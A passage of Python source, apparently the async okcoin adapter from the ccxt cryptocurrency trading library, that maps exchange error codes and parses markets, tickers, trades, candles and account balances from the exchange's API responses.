'36108': InsufficientFunds, # Funds cannot be transferred in or out, as equity of the account is less than zero.
'36109': PermissionDenied, # Funds cannot be transferred in or out during option exercising or settlement.
'36201': PermissionDenied, # New order function is blocked.
'36202': PermissionDenied, # Account does not have permission to short option.
'36203': InvalidOrder, # Invalid format for client_oid.
'36204': ExchangeError, # Invalid format for request_id.
'36205': BadRequest, # Instrument id does not match underlying index.
'36206': BadRequest, # Order_id and client_oid can not be used at the same time.
'36207': InvalidOrder, # Either order price or fartouch price must be present.
'36208': InvalidOrder, # Either order price or size must be present.
'36209': InvalidOrder, # Either order_id or client_oid must be present.
'36210': InvalidOrder, # Either order_ids or client_oids must be present.
'36211': InvalidOrder, # Exceeding max batch size for order submission.
'36212': InvalidOrder, # Exceeding max batch size for order cancellation.
'36213': InvalidOrder, # Exceeding max batch size for order amendment.
'36214': ExchangeError, # Instrument does not have valid bid/ask quote.
'36216': OrderNotFound, # Order does not exist.
'36217': InvalidOrder, # Order submission failed.
'36218': InvalidOrder, # Order cancellation failed.
'36219': InvalidOrder, # Order amendment failed.
'36220': InvalidOrder, # Order is pending cancel.
'36221': InvalidOrder, # Order qty is not valid multiple of lot size.
'36222': InvalidOrder, # Order price is breaching highest buy limit.
'36223': InvalidOrder, # Order price is breaching lowest sell limit.
'36224': InvalidOrder, # Exceeding max order size.
'36225': InvalidOrder, # Exceeding max open order count for instrument.
'36226': InvalidOrder, # Exceeding max open order count for underlying.
'36227': InvalidOrder, # Exceeding max open size across all orders for underlying
'36228': InvalidOrder, # Exceeding max available qty for instrument.
'36229': InvalidOrder, # Exceeding max available qty for underlying.
'36230': InvalidOrder, # Exceeding max position limit for underlying.
},
'broad': {
},
},
'precisionMode': TICK_SIZE,
'options': {
'fetchOHLCV': {
'type': 'Candles', # Candles or HistoryCandles
},
'createMarketBuyOrderRequiresPrice': True,
'fetchMarkets': ['spot'],
'defaultType': 'spot', # 'account', 'spot', 'margin', 'futures', 'swap', 'option'
'accountsByType': {
'spot': '1',
'margin': '5',
'funding': '6',
},
'accountsById': {
'1': 'spot',
'5': 'margin',
'6': 'funding',
},
'auth': {
'time': 'public',
'currencies': 'private',
'instruments': 'public',
'rate': 'public',
'{instrument_id}/constituents': 'public',
},
'warnOnFetchCurrenciesWithoutAuthorization': False,
},
'commonCurrencies': {
# OKEX refers to ERC20 version of Aeternity(AEToken)
'AE': 'AET', # https://github.com/ccxt/ccxt/issues/4981
'BOX': 'DefiBox',
'HOT': 'Hydro Protocol',
'HSR': 'HC',
'MAG': 'Maggie',
'SBTC': 'Super Bitcoin',
'TRADE': 'Unitrade',
'YOYO': 'YOYOW',
'WIN': 'WinToken', # https://github.com/ccxt/ccxt/issues/5701
},
})
async def fetch_time(self, params={}):
"""
fetches the current integer timestamp in milliseconds from the exchange server
:param dict params: extra parameters specific to the okcoin api endpoint
:returns int: the current integer timestamp in milliseconds from the exchange server
"""
response = await self.generalGetTime(params)
#
# {
# "iso": "2015-01-07T23:47:25.201Z",
# "epoch": 1420674445.201
# }
#
return self.parse8601(self.safe_string(response, 'iso'))
async def fetch_markets(self, params={}):
"""
retrieves data on all markets for okcoin
:param dict params: extra parameters specific to the exchange api endpoint
:returns [dict]: an array of objects representing market data
"""
types = self.safe_value(self.options, 'fetchMarkets')
result = []
for i in range(0, len(types)):
markets = await self.fetch_markets_by_type(types[i], params)
result = self.array_concat(result, markets)
return result
def parse_markets(self, markets):
result = []
for i in range(0, len(markets)):
result.append(self.parse_market(markets[i]))
return result
def parse_market(self, market):
#
# spot markets
#
# {
# base_currency: "EOS",
# instrument_id: "EOS-OKB",
# min_size: "0.01",
# quote_currency: "OKB",
# size_increment: "0.000001",
# tick_size: "0.0001"
# }
#
# futures markets
#
# {
# instrument_id: "XRP-USD-200320",
# underlying_index: "XRP",
# quote_currency: "USD",
# tick_size: "0.0001",
# contract_val: "10",
# listing: "2020-03-06",
# delivery: "2020-03-20",
# trade_increment: "1",
# alias: "self_week",
# underlying: "XRP-USD",
# base_currency: "XRP",
# settlement_currency: "XRP",
# is_inverse: "true",
# contract_val_currency: "USD",
# }
#
# swap markets
#
# {
# instrument_id: "BSV-USD-SWAP",
# underlying_index: "BSV",
# quote_currency: "USD",
# coin: "BSV",
# contract_val: "10",
# listing: "2018-12-21T07:53:47.000Z",
# delivery: "2020-03-14T08:00:00.000Z",
# size_increment: "1",
# tick_size: "0.01",
# base_currency: "BSV",
# underlying: "BSV-USD",
# settlement_currency: "BSV",
# is_inverse: "true",
# contract_val_currency: "USD"
# }
#
# options markets
#
# {
# instrument_id: 'BTC-USD-200327-4000-C',
# underlying: 'BTC-USD',
# settlement_currency: 'BTC',
# contract_val: '0.1000',
# option_type: 'C',
# strike: '4000',
# tick_size: '0.0005',
# lot_size: '1.0000',
# listing: '2019-12-25T08:30:36.302Z',
# delivery: '2020-03-27T08:00:00.000Z',
# state: '2',
# trading_start_time: '2019-12-25T08:30:36.302Z',
# timestamp: '2020-03-13T08:05:09.456Z',
# }
#
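# Illustrative symbol construction, derived from the parsing logic below and the sample payloads above:
#
#     spot EOS-OKB -> EOS/OKB
#     futures XRP-USD-200320 -> XRP/USD:XRP-200320
#     swap BSV-USD-SWAP -> BSV/USD:BSV
#     option BTC-USD-200327-4000-C -> BTC/USD:BTC-200327:4000:C
#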
id = self.safe_string(market, 'instrument_id')
optionType = self.safe_value(market, 'option_type')
contractVal = self.safe_number(market, 'contract_val')
contract = contractVal is not None
futuresAlias = self.safe_string(market, 'alias')
marketType = 'spot'
spot = not contract
option = (optionType is not None)
future = not option and (futuresAlias is not None)
swap = contract and not future and not option
baseId = self.safe_string(market, 'base_currency')
quoteId = self.safe_string(market, 'quote_currency')
settleId = self.safe_string(market, 'settlement_currency')
if option:
underlying = self.safe_string(market, 'underlying')
parts = underlying.split('-')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
marketType = 'option'
elif future:
baseId = self.safe_string(market, 'underlying_index')
marketType = 'futures'
elif swap:
marketType = 'swap'
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
settle = self.safe_currency_code(settleId)
symbol = base + '/' + quote
expiryDatetime = self.safe_string(market, 'delivery')
expiry = None
strike = self.safe_value(market, 'strike')
if contract:
symbol = symbol + ':' + settle
if future or option:
if future:
expiryDatetime += 'T00:00:00Z'
expiry = self.parse8601(expiryDatetime)
symbol = symbol + '-' + self.yymmdd(expiry)
if option:
symbol = symbol + ':' + strike + ':' + optionType
optionType = 'call' if (optionType == 'C') else 'put'
lotSize = self.safe_number_2(market, 'lot_size', 'trade_increment')
minPrice = self.safe_string(market, 'tick_size')
minAmountString = self.safe_string_2(market, 'min_size', 'base_min_size')
minAmount = self.parse_number(minAmountString)
minCost = None
if (minAmount is not None) and (minPrice is not None):
minCost = self.parse_number(Precise.string_mul(minPrice, minAmountString))
fees = self.safe_value_2(self.fees, marketType, 'trading', {})
maxLeverageString = self.safe_string(market, 'max_leverage', '1')
maxLeverage = self.parse_number(Precise.string_max(maxLeverageString, '1'))
precisionPrice = self.parse_number(minPrice)
return self.extend(fees, {
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': marketType,
'spot': spot,
'margin': spot and (Precise.string_gt(maxLeverageString, '1')),
'swap': swap,
'future': future,
'futures': future, # deprecated
'option': option,
'active': True,
'contract': contract,
'linear': (quote == settle) if contract else None,
'inverse': (base == settle) if contract else None,
'contractSize': contractVal,
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': strike,
'optionType': optionType,
'precision': {
'amount': self.safe_number(market, 'size_increment', lotSize),
'price': precisionPrice,
},
'limits': {
'leverage': {
'min': self.parse_number('1'),
'max': maxLeverage,
},
'amount': {
'min': minAmount,
'max': None,
},
'price': {
'min': precisionPrice,
'max': None,
},
'cost': {
'min': minCost,
'max': None,
},
},
'info': market,
})
async def fetch_markets_by_type(self, type, params={}):
if type == 'option':
underlying = await self.optionGetUnderlying(params)
result = []
for i in range(0, len(underlying)):
response = await self.optionGetInstrumentsUnderlying({
'underlying': underlying[i],
})
#
# options markets
#
# [
# {
# instrument_id: 'BTC-USD-200327-4000-C',
# underlying: 'BTC-USD',
# settlement_currency: 'BTC',
# contract_val: '0.1000',
# option_type: 'C',
# strike: '4000',
# tick_size: '0.0005',
# lot_size: '1.0000',
# listing: '2019-12-25T08:30:36.302Z',
# delivery: '2020-03-27T08:00:00.000Z',
# state: '2',
# trading_start_time: '2019-12-25T08:30:36.302Z',
# timestamp: '2020-03-13T08:05:09.456Z',
# },
# ]
#
result = self.array_concat(result, response)
return self.parse_markets(result)
elif (type == 'spot') or (type == 'futures') or (type == 'swap'):
method = type + 'GetInstruments'
response = await getattr(self, method)(params)
#
# spot markets
#
# [
# {
# base_currency: "EOS",
# instrument_id: "EOS-OKB",
# min_size: "0.01",
# quote_currency: "OKB",
# size_increment: "0.000001",
# tick_size: "0.0001"
# }
# ]
#
# futures markets
#
# [
# {
# instrument_id: "XRP-USD-200320",
# underlying_index: "XRP",
# quote_currency: "USD",
# tick_size: "0.0001",
# contract_val: "10",
# listing: "2020-03-06",
# delivery: "2020-03-20",
# trade_increment: "1",
# alias: "self_week",
# underlying: "XRP-USD",
# base_currency: "XRP",
# settlement_currency: "XRP",
# is_inverse: "true",
# contract_val_currency: "USD",
# }
# ]
#
# swap markets
#
# [
# {
# instrument_id: "BSV-USD-SWAP",
# underlying_index: "BSV",
# quote_currency: "USD",
# coin: "BSV",
# contract_val: "10",
# listing: "2018-12-21T07:53:47.000Z",
# delivery: "2020-03-14T08:00:00.000Z",
# size_increment: "1",
# tick_size: "0.01",
# base_currency: "BSV",
# underlying: "BSV-USD",
# settlement_currency: "BSV",
# is_inverse: "true",
# contract_val_currency: "USD"
# }
# ]
#
return self.parse_markets(response)
else:
raise NotSupported(self.id + ' fetchMarketsByType() does not support market type ' + type)
async def fetch_currencies(self, params={}):
"""
fetches all available currencies on an exchange
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an associative dictionary of currencies
"""
# despite that their docs say these endpoints are public:
# https://www.okex.com/api/account/v3/withdrawal/fee
# https://www.okex.com/api/account/v3/currencies
# it will still reply with {"code":30001, "message": "OK-ACCESS-KEY header is required"}
# if you attempt to access it without authentication
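# Usage sketch(illustrative only; `exchange` is a hypothetical okcoin instance created with
# apiKey, secret and password, otherwise this method returns None as handled below):
#
#     currencies = await exchange.fetch_currencies()
#     # currencies['BTC']['limits']['withdraw']['min'] -> minimum withdrawal amount
#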
if not self.check_required_credentials(False):
if self.options['warnOnFetchCurrenciesWithoutAuthorization']:
raise ExchangeError(self.id + ' fetchCurrencies() is a private API endpoint that requires authentication with API keys. Set the API keys on the exchange instance or exchange.options["warnOnFetchCurrenciesWithoutAuthorization"] = False to suppress this warning message.')
return None
else:
response = await self.accountGetCurrencies(params)
#
# [
# {
# name: '',
# currency: 'BTC',
# can_withdraw: '1',
# can_deposit: '1',
# min_withdrawal: '0.0100000000000000'
# },
# ]
#
result = {}
for i in range(0, len(response)):
currency = response[i]
id = self.safe_string(currency, 'currency')
code = self.safe_currency_code(id)
name = self.safe_string(currency, 'name')
canDeposit = self.safe_integer(currency, 'can_deposit')
canWithdraw = self.safe_integer(currency, 'can_withdraw')
depositEnabled = (canDeposit == 1)
withdrawEnabled = (canWithdraw == 1)
active = depositEnabled and withdrawEnabled
result[code] = {
'id': id,
'code': code,
'info': currency,
'type': None,
'name': name,
'active': active,
'deposit': depositEnabled,
'withdraw': withdrawEnabled,
'fee': None, # todo: redesign
'precision': self.parse_number('0.00000001'),
'limits': {
'amount': {'min': None, 'max': None},
'withdraw': {
'min': self.safe_number(currency, 'min_withdrawal'),
'max': None,
},
},
}
return result
async def fetch_order_book(self, symbol, limit=None, params={}):
"""
fetches information on open orders with bid(buy) and ask(sell) prices, volumes and other data
:param str symbol: unified symbol of the market to fetch the order book for
:param int|None limit: the maximum amount of order book entries to return
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an `order book structure <https://docs.ccxt.com/en/latest/manual.html#order-book-structure>` for the requested market symbol
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentId'
method += 'Depth' if (market['type'] == 'swap') else 'Book'
request = {
'instrument_id': market['id'],
}
if limit is not None:
request['size'] = limit # max 200
response = await getattr(self, method)(self.extend(request, params))
#
# spot
#
# { asks: [["0.02685268", "0.242571", "1"],
# ["0.02685493", "0.164085", "1"],
# ...
# ["0.02779", "1.039", "1"],
# ["0.027813", "0.0876", "1"] ],
# bids: [["0.02684052", "10.371849", "1"],
# ["0.02684051", "3.707", "4"],
# ...
# ["0.02634963", "0.132934", "1"],
# ["0.02634962", "0.264838", "2"] ],
# timestamp: "2018-12-17T20:24:16.159Z" }
#
# swap
#
# {
# "asks":[
# ["916.21","94","0","1"]
# ],
# "bids":[
# ["916.1","15","0","1"]
# ],
# "time":"2021-04-16T02:04:48.282Z"
# }
#
timestamp = self.parse8601(self.safe_string_2(response, 'timestamp', 'time'))
return self.parse_order_book(response, symbol, timestamp)
def parse_ticker(self, ticker, market=None):
#
# { best_ask: "0.02665472",
# best_bid: "0.02665221",
# instrument_id: "ETH-BTC",
# product_id: "ETH-BTC",
# last: "0.02665472",
# ask: "0.02665472", # missing in the docs
# bid: "0.02665221", # not mentioned in the docs
# open_24h: "0.02645482",
# high_24h: "0.02714633",
# low_24h: "0.02614109",
# base_volume_24h: "572298.901923",
# timestamp: "2018-12-17T21:20:07.856Z",
# quote_volume_24h: "15094.86831261" }
#
timestamp = self.parse8601(self.safe_string(ticker, 'timestamp'))
marketId = self.safe_string(ticker, 'instrument_id')
market = self.safe_market(marketId, market, '-')
symbol = market['symbol']
last = self.safe_string(ticker, 'last')
open = self.safe_string(ticker, 'open_24h')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high_24h'),
'low': self.safe_string(ticker, 'low_24h'),
'bid': self.safe_string(ticker, 'best_bid'),
'bidVolume': self.safe_string(ticker, 'best_bid_size'),
'ask': self.safe_string(ticker, 'best_ask'),
'askVolume': self.safe_string(ticker, 'best_ask_size'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_string(ticker, 'base_volume_24h'),
'quoteVolume': self.safe_string(ticker, 'quote_volume_24h'),
'info': ticker,
}, market)
async def fetch_ticker(self, symbol, params={}):
"""
fetches a price ticker, a statistical calculation with the information calculated over the past 24 hours for a specific market
:param str symbol: unified symbol of the market to fetch the ticker for
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: a `ticker structure <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentIdTicker'
request = {
'instrument_id': market['id'],
}
response = await getattr(self, method)(self.extend(request, params))
#
# { best_ask: "0.02665472",
# best_bid: "0.02665221",
# instrument_id: "ETH-BTC",
# product_id: "ETH-BTC",
# last: "0.02665472",
# ask: "0.02665472",
# bid: "0.02665221",
# open_24h: "0.02645482",
# high_24h: "0.02714633",
# low_24h: "0.02614109",
# base_volume_24h: "572298.901923",
# timestamp: "2018-12-17T21:20:07.856Z",
# quote_volume_24h: "15094.86831261" }
#
return self.parse_ticker(response)
async def fetch_tickers_by_type(self, type, symbols=None, params={}):
await self.load_markets()
method = type + 'GetInstrumentsTicker'
response = await getattr(self, method)(params)
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
async def fetch_tickers(self, symbols=None, params={}):
"""
fetches price tickers for multiple markets, statistical calculations with the information calculated over the past 24 hours for each market
:param [str]|None symbols: unified symbols of the markets to fetch the ticker for, all market tickers are returned if not assigned
:param dict params: extra parameters specific to the okcoin api endpoint
:returns dict: an array of `ticker structures <https://docs.ccxt.com/en/latest/manual.html#ticker-structure>`
"""
defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType')
type = self.safe_string(params, 'type', defaultType)
return await self.fetch_tickers_by_type(type, symbols, self.omit(params, 'type'))
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# spot trades
#
# {
# time: "2018-12-17T23:31:08.268Z",
# timestamp: "2018-12-17T23:31:08.268Z",
# trade_id: "409687906",
# price: "0.02677805",
# size: "0.923467",
# side: "sell"
# }
#
# futures trades, swap trades
#
# {
# trade_id: "1989230840021013",
# side: "buy",
# price: "92.42",
# qty: "184", # missing in swap markets
# size: "5", # missing in futures markets
# timestamp: "2018-12-17T23:26:04.613Z"
# }
#
# fetchOrderTrades(private)
#
# spot trades, margin trades
#
# {
# "created_at":"2019-03-15T02:52:56.000Z",
# "exec_type":"T", # whether the order is taker or maker
# "fee":"0.00000082",
# "instrument_id":"BTC-USDT",
# "ledger_id":"3963052721",
# "liquidity":"T", # whether the order is taker or maker
# "order_id":"2482659399697408",
# "price":"3888.6",
# "product_id":"BTC-USDT",
# "side":"buy",
# "size":"0.00055306",
# "timestamp":"2019-03-15T02:52:56.000Z"
# },
#
# futures trades, swap trades
#
# {
# "trade_id":"197429674631450625",
# "instrument_id":"EOS-USD-SWAP",
# "order_id":"6a-7-54d663a28-0",
# "price":"3.633",
# "order_qty":"1.0000",
# "fee":"-0.000551",
# "created_at":"2019-03-21T04:41:58.0Z", # missing in swap trades
# "timestamp":"2019-03-25T05:56:31.287Z", # missing in futures trades
# "exec_type":"M", # whether the order is taker or maker
# "side":"short", # "buy" in futures trades
# }
#
symbol = None
marketId = self.safe_string(trade, 'instrument_id')
base = None
quote = None
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
symbol = market['symbol']
base = market['base']
quote = market['quote']
elif marketId is not None:
parts = marketId.split('-')
numParts = len(parts)
if numParts == 2:
baseId, quoteId = parts
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = marketId
if (symbol is None) and (market is not None):
symbol = market['symbol']
base = market['base']
quote = market['quote']
timestamp = self.parse8601(self.safe_string_2(trade, 'timestamp', 'created_at'))
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string_2(trade, 'size', 'qty')
amountString = self.safe_string(trade, 'order_qty', amountString)
takerOrMaker = self.safe_string_2(trade, 'exec_type', 'liquidity')
if takerOrMaker == 'M':
takerOrMaker = 'maker'
elif takerOrMaker == 'T':
takerOrMaker = 'taker'
side = self.safe_string(trade, 'side')
feeCostString = self.safe_string(trade, 'fee')
fee = None
if feeCostString is not None:
feeCurrency = base if (side == 'buy') else quote
fee = {
# fee is either a positive number(invitation rebate)
# or a negative number(transaction fee deduction)
# therefore we need to invert the fee
# more about it https://github.com/ccxt/ccxt/issues/5909
'cost': Precise.string_neg(feeCostString),
'currency': feeCurrency,
}
orderId = self.safe_string(trade, 'order_id')
return self.safe_trade({
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': self.safe_string_2(trade, 'trade_id', 'ledger_id'),
'order': orderId,
'type': None,
'takerOrMaker': takerOrMaker,
'side': side,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
"""
get the list of most recent trades for a particular symbol
:param str symbol: unified symbol of the market to fetch trades for
:param int|None since: timestamp in ms of the earliest trade to fetch
:param int|None limit: the maximum amount of trades to fetch
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html?#public-trades>`
"""
await self.load_markets()
market = self.market(symbol)
method = market['type'] + 'GetInstrumentsInstrumentIdTrades'
if (limit is None) or (limit > 100):
limit = 100 # maximum = default = 100
request = {
'instrument_id': market['id'],
'limit': limit,
# from: 'id',
# to: 'id',
}
response = await getattr(self, method)(self.extend(request, params))
#
# spot markets
#
# [
# {
# time: "2018-12-17T23:31:08.268Z",
# timestamp: "2018-12-17T23:31:08.268Z",
# trade_id: "409687906",
# price: "0.02677805",
# size: "0.923467",
# side: "sell"
# }
# ]
#
# futures markets, swap markets
#
# [
# {
# trade_id: "1989230840021013",
# side: "buy",
# price: "92.42",
# qty: "184", # missing in swap markets
# size: "5", # missing in futures markets
# timestamp: "2018-12-17T23:26:04.613Z"
# }
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# spot markets
#
# {
# close: "0.02684545",
# high: "0.02685084",
# low: "0.02683312",
# open: "0.02683894",
# time: "2018-12-17T20:28:00.000Z",
# volume: "101.457222"
# }
#
# futures markets
#
# [
# 1545072720000,
# 0.3159,
# 0.3161,
# 0.3144,
# 0.3149,
# 22886,
# 725179.26172331,
# ]
#
if isinstance(ohlcv, list):
numElements = len(ohlcv)
volumeIndex = 6 if (numElements > 6) else 5
timestamp = self.safe_value(ohlcv, 0)
if isinstance(timestamp, str):
timestamp = self.parse8601(timestamp)
return [
timestamp, # timestamp
self.safe_number(ohlcv, 1), # Open
self.safe_number(ohlcv, 2), # High
self.safe_number(ohlcv, 3), # Low
self.safe_number(ohlcv, 4), # Close
# self.safe_number(ohlcv, 5), # Quote Volume
# self.safe_number(ohlcv, 6), # Base Volume
self.safe_number(ohlcv, volumeIndex), # Volume, okex will return base volume in the 7th element for future markets
]
else:
return [
self.parse8601(self.safe_string(ohlcv, 'time')),
self.safe_number(ohlcv, 'open'), # Open
self.safe_number(ohlcv, 'high'), # High
self.safe_number(ohlcv, 'low'), # Low
self.safe_number(ohlcv, 'close'), # Close
self.safe_number(ohlcv, 'volume'), # Base Volume
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
"""
fetches historical candlestick data containing the open, high, low, and close price, and the volume of a market
:param str symbol: unified symbol of the market to fetch OHLCV data for
:param str timeframe: the length of time each candle represents
:param int|None since: timestamp in ms of the earliest candle to fetch
:param int|None limit: the maximum amount of candles to fetch
:param dict params: extra parameters specific to the okcoin api endpoint
:returns [[int]]: A list of candles ordered as timestamp, open, high, low, close, volume
"""
await self.load_markets()
market = self.market(symbol)
duration = self.parse_timeframe(timeframe)
request = {
'instrument_id': market['id'],
'granularity': self.timeframes[timeframe],
}
options = self.safe_value(self.options, 'fetchOHLCV', {})
defaultType = self.safe_string(options, 'type', 'Candles') # Candles or HistoryCandles
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
method = market['type'] + 'GetInstrumentsInstrumentId' + type
if type == 'Candles':
if since is not None:
if limit is not None:
request['end'] = self.iso8601(self.sum(since, limit * duration * 1000))
request['start'] = self.iso8601(since)
else:
if limit is not None:
now = self.milliseconds()
request['start'] = self.iso8601(now - limit * duration * 1000)
request['end'] = self.iso8601(now)
elif type == 'HistoryCandles':
if market['option']:
raise NotSupported(self.id + ' fetchOHLCV() does not have ' + type + ' for ' + market['type'] + ' markets')
if since is not None:
if limit is None:
limit = 300 # default
request['start'] = self.iso8601(self.sum(since, limit * duration * 1000))
request['end'] = self.iso8601(since)
else:
if limit is not None:
now = self.milliseconds()
request['end'] = self.iso8601(now - limit * duration * 1000)
request['start'] = self.iso8601(now)
response = await getattr(self, method)(self.extend(request, params))
#
# spot markets
#
# [
# {
# close: "0.02683401",
# high: "0.02683401",
# low: "0.02683401",
# open: "0.02683401",
# time: "2018-12-17T23:47:00.000Z",
# volume: "0"
# },
# {
# close: "0.02684545",
# high: "0.02685084",
# low: "0.02683312",
# open: "0.02683894",
# time: "2018-12-17T20:28:00.000Z",
# volume: "101.457222"
# }
# ]
#
# futures
#
# [
# [
# 1545090660000,
# 0.3171,
# 0.3174,
# 0.3171,
# 0.3173,
# 1648,
# 51930.38579450868
# ],
# [
# 1545072720000,
# 0.3159,
# 0.3161,
# 0.3144,
# 0.3149,
# 22886,
# 725179.26172331
# ]
# ]
#
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def parse_account_balance(self, response):
#
# account
#
# [
# {
# balance: 0,
# available: 0,
# currency: "BTC",
# hold: 0
# },
# {
# balance: 0,
# available: 0,
# currency: "ETH",
# hold: 0
# }
# ]
#
# spot
#
# [
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "BTC",
# balance: "0.0000000497717339",
# available: "0.0000000497717339",
# holds: "0"
# },
# {
# frozen: "0",
# hold: "0",
# id: "2149632",
# currency: "ICN",
# balance: "0.00000000925",
# available: "0.00000000925",
# holds: "0"
# }
# ]
#
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
for i in range(0, len(response)):
balance = response[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_string(balance, 'balance')
account['used'] = self.safe_string(balance, 'hold')
account['free'] = self.safe_string(balance, 'available')
result[code] = account
return self.safe_balance(result)
def parse_margin_balance(self, response):
#
# [
# {
# "currency:BTC": {
# "available":"0",
# "balance":"0",
# "borrowed":"0",
# "can_withdraw":"0",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "currency:USDT": {
# "available":"100",
# "balance":"100",
# "borrowed":"0",
# "can_withdraw":"100",
# "frozen":"0",
# "hold":"0",
# "holds":"0",
# "lending_fee":"0"
# },
# "instrument_id":"BTC-USDT",
# "liquidation_price":"0",
# "product_id":"BTC-USDT",
# "risk_rate":""
# },
# ]
#
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
for i in range(0, len(response)):
balance = response[i]
marketId = self.safe_string(balance, 'instrument_id')
market = self.safe_value(self.markets_by_id, marketId)
symbol = None
if market is None:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
else:
symbol = market['symbol']
omittedBalance = self.omit(balance, [
'instrument_id',
'liquidation_price',
'product_id',
'risk_rate',
'margin_ratio',
'maint_margin_ratio',
'tiers',
])
keys = list(omittedBalance.keys())
accounts = {}
for k in range(0, len(keys)):
key = keys[k]
marketBalance = balance[key]
if key.find(':') >= 0:
parts = key.split(':')
currencyId = parts[1]
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_string(marketBalance, 'balance')
account['used'] = self.safe_string(marketBalance, 'hold')
account['free'] = self.safe_string(marketBalance, 'available')
accounts[code] = account
else:
raise NotSupported(self.id + ' margin balance response format has changed!')
result[symbol] = self.safe_balance(accounts)
return result
def parse_futures_balance(self, response):
#
# {
# "info":{
# "eos":{
# "auto_margin":"0",
# "contracts": [
# {
# "available_qty":"40.37069445",
# "fixed_balance":"0",
# "instrument_id":"EOS-USD-190329",
# "margin_for_unfilled":"0",
# "margin_frozen":"0",
# "realized_pnl":"0",
# "unrealized_pnl":"0"
# },
# {
# "available_qty":"40.37069445",
# "fixed_balance":"14.54895721",
# "instrument_id":"EOS-USD-190628",
# "margin_for_unfilled":"0",
# "margin_frozen":"10.64042157",
# "realized_pnl":"-3.90853564",
# "unrealized_pnl":"-0.259"
# },
# ],
# "equity":"50.75220665",
# "margin_mode":"fixed",
# "total_avail_balance":"40.37069445"
# },
# }
# }
#
# their root field name is "info", so our info will contain their info
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
info = self.safe_value(response, 'info', {})
ids = list(info.keys())
for i in range(0, len(ids)):
id = ids[i]
code = self.safe_currency_code(id)
balance = self.safe_value(info, id, {})
account = self.account()
totalAvailBalance = self.safe_string(balance, 'total_avail_balance')
if self.safe_string(balance, 'margin_mode') == 'fixed':
contracts = self.safe_value(balance, 'contracts', [])
free = totalAvailBalance
for j in range(0, len(contracts)):
contract = contracts[j]
fixedBalance = self.safe_string(contract, 'fixed_balance')
realizedPnl = self.safe_string(contract, 'realized_pnl')
marginFrozen = self.safe_string(contract, 'margin_frozen')
marginForUnfilled = self.safe_string(contract, 'margin_for_unfilled')
margin = Precise.string_sub(Precise.string_sub(Precise.string_add(fixedBalance, realizedPnl), marginFrozen), marginForUnfilled)
free = Precise.string_add(free, margin)
account['free'] = free
else:
realizedPnl = self.safe_string(balance, 'realized_pnl')
unrealizedPnl = self.safe_string(balance, 'unrealized_pnl')
marginFrozen = self.safe_string(balance, 'margin_frozen')
marginForUnfilled = self.safe_string(balance, 'margin_for_unfilled')
positive = Precise.string_add(Precise.string_add(totalAvailBalance, realizedPnl), unrealizedPnl)
account['free'] = Precise.string_sub(Precise.string_sub(positive, marginFrozen), marginForUnfilled)
# it may be incorrect to use total, free and used for swap accounts
account['total'] = self.safe_string(balance, 'equity')
result[code] = account
return self.safe_balance(result)
def parse_swap_balance(self, response):
#
# {
# "info": [
# {
# "equity":"3.0139",
# "fixed_balance":"0.0000",
# "instrument_id":"EOS-USD-SWAP",
# "margin":"0.5523",
# "margin_frozen":"0.0000",
# "margin_mode":"crossed",
# "margin_ratio":"1.0913",
# "realized_pnl":"-0.0006",
# "timestamp":"2019-03-25T03:46:10.336Z",
# "total_avail_balance":"3.0000",
# "unrealized_pnl":"0.0145"
# }
# ]
# }
#
# their root field name is "info", so our info will contain their info
result = {'info': response}
timestamp = None
info = self.safe_value(response, 'info', [])
for i in range(0, len(info)):
balance = info[i]
marketId = self.safe_string(balance, 'instrument_id')
symbol = marketId
if marketId in self.markets_by_id:
symbol = self.markets_by_id[marketId]['symbol']
balanceTimestamp = self.parse8601(self.safe_string(balance, 'timestamp'))
timestamp = balanceTimestamp if (timestamp is None) else max(timestamp, balanceTimestamp)
account = self.account()
# it may be incorrect to use total, free and used for swap accounts
account['total'] = self.safe_string(balance, 'equity')
account['free'] = self.safe_string(balance, 'total_avail_balance')
result[symbol] = account
result['timestamp'] = timestamp
